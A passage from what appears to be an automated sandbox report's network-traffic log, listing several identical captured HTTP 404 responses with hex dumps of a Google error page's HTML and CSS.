3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
